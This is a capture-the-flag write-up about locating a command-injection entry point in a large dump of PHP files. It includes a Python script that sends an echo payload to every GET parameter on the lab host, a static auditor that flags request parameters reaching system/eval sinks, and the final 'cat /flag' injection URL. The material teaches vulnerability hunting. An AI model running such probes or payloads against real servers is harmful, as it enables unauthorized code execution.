This post records a security newbie's journey through practice challenges; experts, please go easy on me, and I hope it is of some help to you.
Opening the target, we find the source code has already been handed to us, so we download it straight from the URL.

Opening the archive, there are a lot of PHP files, no telling which one we are looking for, and no hint anywhere else.

Opening a few files at random,

we see lots of GET and POST parameters, and some of those parameters are passed into command functions such as system and eval.
Trying them one by one is too tedious, so we need to write some code to do the screening for us.
```python
import os
import re
import requests

url = 'http://36d3d08f-a863-4ceb-a6cf-a1a5cbffbf98.node5.buuoj.cn:81/'
path = r'D:\下载\www\src'  # raw string so the backslashes are not treated as escapes

# $_GET['name'] reads in the PHP source, and the marker we expect back if the payload ran
ptn_get = re.compile(br"\$_GET\['(\w+)'\]")
ptn_res = re.compile(br'success_hack')

# Valid both as a shell command (system) and as PHP code (eval), so one probe covers both sinks
cmd = 'echo "success_hack";'

for f in os.scandir(path):
    if not f.is_file() or not f.name.endswith('.php'):
        continue
    print(f"Scanning file: {f.name}")
    try:
        with open(f.path, 'rb') as fp:
            data = fp.read()
    except OSError:
        print(f"Cannot read file: {f.name}")
        continue

    get_params = set(ptn_get.findall(data))
    for param in get_params:
        param_name = param.decode('ascii')
        try:
            # requests URL-encodes the payload; the PHP file is fetched by its name on the target
            r = requests.get(url + f.name, params={param_name: cmd}, timeout=10)
            if ptn_res.search(r.content):
                print(f"Vulnerability found! File: {f.name}, parameter: {param_name}")
                raise SystemExit(0)
        except requests.Timeout:
            print(f"Request timed out: {f.name}?{param_name}=...")
            continue
        except requests.RequestException as e:
            print(f"Request failed: {f.name} - {e}")
            continue

print("Scan complete, no vulnerability found")
```
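Every probe in that script costs one HTTP request per GET parameter, which is what makes the dynamic scan slow. A cheaper first pass is to audit the downloaded source offline for parameters that actually flow into a command or code sink, and only fire live probes at the files that come up. The static pre-filter below is an added example written for this write-up, not code from the original post. The PHP snippets and file names (index.php, a1.php, b2.php) are constructed samples, not the challenge's real files. The regexes are a heuristic (direct `system($_GET['x'])` calls and one-hop aliases like `$c = $_POST['d']; eval($c);`), not a real taint analysis, so code that routes input through several variables, variable-variables or string building will slip past it; that is exactly why the live probe is still worth running against whatever it does not flag.

```python
import os
import re
import tempfile

# Superglobal reads like $_GET['x'], $_POST["x"], $_REQUEST['x']
PARAM_RE = re.compile(r"\$_(GET|POST|REQUEST)\s*\[\s*['\"](\w+)['\"]\s*\]")
# One-hop aliases like $c = $_POST['data'];  (captures var, method, param)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\$_(GET|POST|REQUEST)\s*\[\s*['\"](\w+)['\"]\s*\]")
# Command/code execution sinks; PHP function names are case-insensitive, hence re.I
SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval", "assert")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\((.*?)\)\s*;", re.S | re.I)
# Any plain PHP variable inside a sink's argument text
VAR_RE = re.compile(r"\$(\w+)")


def audit_php(source):
    """Return sorted (method, param, sink) triples for request parameters that reach a sink."""
    aliases = {var: (method, param) for var, method, param in ASSIGN_RE.findall(source)}
    findings = set()
    for sink, args in SINK_RE.findall(source):
        # direct form: system($_GET['cmd'])
        for method, param in PARAM_RE.findall(args):
            findings.add((method, param, sink.lower()))
        # alias form: $c = $_POST['data']; ... eval($c);
        for var in VAR_RE.findall(args):
            if var in aliases:
                method, param = aliases[var]
                findings.add((method, param, sink.lower()))
    return sorted(findings)


def audit_dir(path):
    """Scan every .php file directly under path; return {filename: findings} for files with hits."""
    report = {}
    for entry in os.scandir(path):
        if not entry.is_file() or not entry.name.endswith(".php"):
            continue
        with open(entry.path, "r", encoding="utf-8", errors="replace") as fp:
            findings = audit_php(fp.read())
        if findings:
            report[entry.name] = findings
    return report


# Constructed sample tree (hypothetical names, not the challenge's real files):
# one harmless page, one alias-then-eval page, one direct system() page.
SAMPLES = {
    "index.php": "<?php echo 'hello ' . htmlspecialchars($_GET['name']); ?>",
    "a1.php": "<?php\n$c = $_POST['data'];\nif (strlen($c) < 64) { eval($c); }\n",
    "b2.php": "<?php\nSystem($_GET['cmd']);\necho shell_exec('id');\n",
}


def write_samples(directory):
    """Write the constructed samples into directory and return it."""
    for name, body in SAMPLES.items():
        with open(os.path.join(directory, name), "w", encoding="utf-8") as fp:
            fp.write(body)
    return directory


def run_samples():
    """Write the samples to a temp dir, audit it, and return the report."""
    with tempfile.TemporaryDirectory() as d:
        write_samples(d)
        return audit_dir(d)


if __name__ == "__main__":
    # To use on the real download, call audit_dir(r'D:\下载\www\src') instead of run_samples()
    for name, hits in run_samples().items():
        for method, param, sink in hits:
            print(f"{name}: $_{method}['{param}'] reaches {sink}()")
```

On the samples this reports only a1.php (`$_POST['data']` reaching eval) and b2.php (`$_GET['cmd']` reaching system); index.php, which just echoes an escaped parameter, is not flagged. The shell_exec('id') call in b2.php is a sink with no attacker-controlled input and is correctly ignored, which is the difference between "calls system()" and "passes our parameter to system()".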

The screening takes quite a while, but it eventually finds that the payload

```
/xk0SzyKwfzw.php?Efa5BVG=cat /flag
```

is the command entry point. Note that the script only probes `$_GET` parameters; the POST parameters seen in the source would need the same loop with `requests.post`, but here the GET probe was enough.

We get the flag.